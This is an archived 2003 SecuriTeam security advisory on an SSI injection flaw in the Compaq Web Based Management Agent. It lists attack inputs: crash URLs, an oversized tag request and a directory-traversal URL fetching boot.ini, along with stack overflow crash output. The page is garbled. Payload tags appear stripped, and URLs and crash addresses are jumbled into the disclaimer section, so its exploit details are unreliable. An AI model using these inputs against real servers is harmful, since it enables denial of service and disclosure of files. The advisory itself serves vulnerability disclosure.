[NEWS] SSI Vulnerability in Compaq Web Based Management Agent
From: SecuriTeam (support_at_securiteam.com)
Date: 06/24/03
- Previous message: SecuriTeam: "[NEWS] Sphera HostingDirector and Final User Control Panel CSS, DoS and Session Hijacking"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 24 Jun 2003 18:41:07 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security in Canada
Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
We welcome ISPs, system integrators and IT systems resellers
to promote the most advanced vulnerability assessment solutions today.
Contact us at 416-482-0038 or at canadasales@beyondsecurity.com
- - - - - - - - -
SSI Vulnerability in Compaq Web Based Management Agent
------------------------------------------------------------------------
SUMMARY
The Compaq Web Based Management Agent for Servers provides device
information for all managed subsystems and alerts for SNMP traps. The
agent has been found to contain a vulnerability that allows remote
attackers to cause the server to include arbitrary SSI in the response it
sends back to the user (allowing an attacker to execute these SSIs). These
SSI allow attackers at the very least, to cause the agent to crash, and to
reveal the existence of files.
DETAILS
The Compaq Web Based Management Agent can run either on TCP port 2301
(HTTP) or 2381 (HTTPS). The agent uses "tags" to run functions at the
server side.
To list all tags:
To crash the agent:
http://IP:2301/survey/<!>
http://IP:2301/>
http://IP:2301/>
http://IP:2301/survey/>
http://IP:2301/>
http://IP:2301/>
GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0
Check file existence (with a 'input box'):
ADDITIONAL INFORMATION
The information has been provided by
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
====================
DISCLAIMER:
http://IP:2301/>
http://IP:2301/<!>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
Stack overflow (0xc00000fd), Address: 0x10039869
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
Stack overflow (0xc00000fd), Address: 0x10039869
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
Access violation (0xc0000005), Address: 0x100368a5
http://IP:2301/>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini
<mailto:ian.vitek@as5-5-7.bi.s.bonet.se> Ian Vitek, the vulnerabilities
were discovered by Bashis.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Relevant Pages
... SSI vulnerability in Compaq Web Based Management Agent ... Bashis has found
several vulnerabilities ... The agent uses "tags" to run funktions at the server
side. ... Stack overflow, Address: 0x77f0c3dc ... (VulnWatch)
... SSI vulnerability in Compaq Web Based Management Agent ... The agent uses "tags"
to run funktions at the server side. ... Stack overflow, Address: 0x77f0c3dc ...
It looks like you could create script objects. ... (Vuln-Dev)
